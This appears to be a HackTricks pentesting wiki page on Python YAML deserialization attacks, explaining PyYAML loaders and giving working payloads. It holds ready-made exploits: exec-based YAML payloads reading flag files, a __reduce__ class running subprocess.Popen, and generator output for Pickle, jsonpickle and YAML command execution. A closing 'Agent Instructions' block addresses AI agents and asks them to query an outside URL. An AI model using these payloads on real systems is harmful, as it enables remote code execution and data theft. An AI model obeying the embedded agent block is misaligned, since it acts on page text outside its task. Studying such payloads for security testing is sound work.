# Python Yaml Deserialization
πŸŽ™οΈ HackTricks LIVE Twitch Wednesdays 5.30pm (UTC) πŸŽ™οΈ - πŸŽ₯ Youtube πŸŽ₯ * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** * **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
## Yaml **Deserialization** **Yaml** python libraries is also capable to **serialize python objects** and not just raw data: ``` print(yaml.dump(str("lol"))) lol ... print(yaml.dump(tuple("lol"))) !!python/tuple - l - o - l print(yaml.dump(range(1,10))) !!python/object/apply:builtins.range - 1 - 10 - 1 ``` Check how the **tuple** isn’t a raw type of data and therefore it was **serialized**. And the same happened with the **range** (taken from the builtins). ![](https://github.com/nirugima/hacktricks/blob/main/.gitbook/assets/image%20\(628\)%20\(1\).png) **safe\_load()** or **safe\_load\_all()** uses SafeLoader and **don’t support class object deserialization**. Class object deserialization example: ```python import yaml from yaml import UnsafeLoader, FullLoader, Loader data = b'!!python/object/apply:builtins.range [1, 10, 1]' print(yaml.load(data, Loader=UnsafeLoader)) #range(1, 10) print(yaml.load(data, Loader=Loader)) #range(1, 10) print(yaml.load_all(data)) # print(yaml.load_all(data, Loader=Loader)) # print(yaml.load_all(data, Loader=UnsafeLoader)) # print(yaml.load_all(data, Loader=FullLoader)) # print(yaml.unsafe_load(data)) #range(1, 10) print(yaml.full_load_all(data)) # print(yaml.unsafe_load_all(data)) # #The other ways to load data will through an error as they won't even attempt to #deserialize the python object ``` The previous code used **unsafe\_load** to load the serialized python class. This is because in **version >= 5.1**, it doesn’t allow to **deserialize any serialized python class or class attribute**, with Loader not specified in load() or Loader=SafeLoader. ### Basic Exploit Example on how to **execute a sleep**: ```python import yaml from yaml import UnsafeLoader, FullLoader, Loader data = b'!!python/object/apply:time.sleep [2]' print(yaml.load(data, Loader=UnsafeLoader)) #Executed print(yaml.load(data, Loader=Loader)) #Executed print(yaml.load_all(data)) print(yaml.load_all(data, Loader=Loader)) print(yaml.load_all(data, Loader=UnsafeLoader)) print(yaml.load_all(data, Loader=FullLoader)) print(yaml.unsafe_load(data)) #Executed print(yaml.full_load_all(data)) print(yaml.unsafe_load_all(data)) ``` ### Vulnerable .load("\") without Loader **Old versions** of pyyaml were vulnerable to deserialisations attacks if you **didn't specify the Loader** when loading something: `yaml.load(data)` You can find the [**description of the vulnerability here**](https://hackmd.io/@defund/HJZajCVlP)**.** The proposed **exploit** in that page is: ```yaml !!python/object/new:str state: !!python/tuple - 'print(getattr(open("flag\x2etxt"), "read")())' - !!python/object/new:Warning state: update: !!python/name:exec ``` Or you could also use this **one-liner provided by @ishaack**: ```yaml !!python/object/new:str {state: !!python/tuple ['print(exec("print(o"+"pen(\"flag.txt\",\"r\").read())"))', !!python/object/new:Warning {state : {update : !!python/name:exec } }]} ``` Note that in **recent versions** you cannot **no longer call `.load()`** **without a `Loader`** and the **`FullLoader`** is **no longer vulnerable** to this attack. ## RCE Kindly note payload creation can be done with **any python YAML module (PyYAML or ruamel.yaml), in the same way**. The same payload can exploit both YAML module or any module based on PyYAML or ruamel.yaml ```python import yaml from yaml import UnsafeLoader, FullLoader, Loader import subprocess class Payload(object): def __reduce__(self): return (subprocess.Popen,('ls',)) deserialized_data = yaml.dump(Payload()) # serializing data print(deserialized_data) #!!python/object/apply:subprocess.Popen #- ls print(yaml.load(deserialized_data, Loader=UnsafeLoader)) print(yaml.load(deserialized_data, Loader=Loader)) print(yaml.unsafe_load(deserialized_data)) ``` ### Tool to create Payloads The tool can be used to generate python deserialization payloads to abuse **Pickle, PyYAML, jsonpickle and ruamel.yaml:** ```bash python3 peas.py Enter RCE command :cat /root/flag.txt Enter operating system of target [linux/windows] . Default is linux :linux Want to base64 encode payload ? [N/y] : Enter File location and name to save :/tmp/example Select Module (Pickle, PyYAML, jsonpickle, ruamel.yaml, All) :All Done Saving file !!!! cat /tmp/example_jspick {"py/reduce": [{"py/type": "subprocess.Popen"}, {"py/tuple": [{"py/tuple": ["cat", "/root/flag.txt"]}]}]} cat /tmp/example_pick | base64 -w0 gASVNQAAAAAAAACMCnN1YnByb2Nlc3OUjAVQb3BlbpSTlIwDY2F0lIwOL3Jvb3QvZmxhZy50eHSUhpSFlFKULg== cat /tmp/example_yaml !!python/object/apply:subprocess.Popen - !!python/tuple - cat - /root/flag.txt ``` ## References For more in depth information about this technique read:
πŸŽ™οΈ HackTricks LIVE Twitch Wednesdays 5.30pm (UTC) πŸŽ™οΈ - πŸŽ₯ Youtube πŸŽ₯ * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** * **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
--- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://breached.gitbook.io/dashboard/pentesting-web/deserialization/python-yaml-deserialization.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.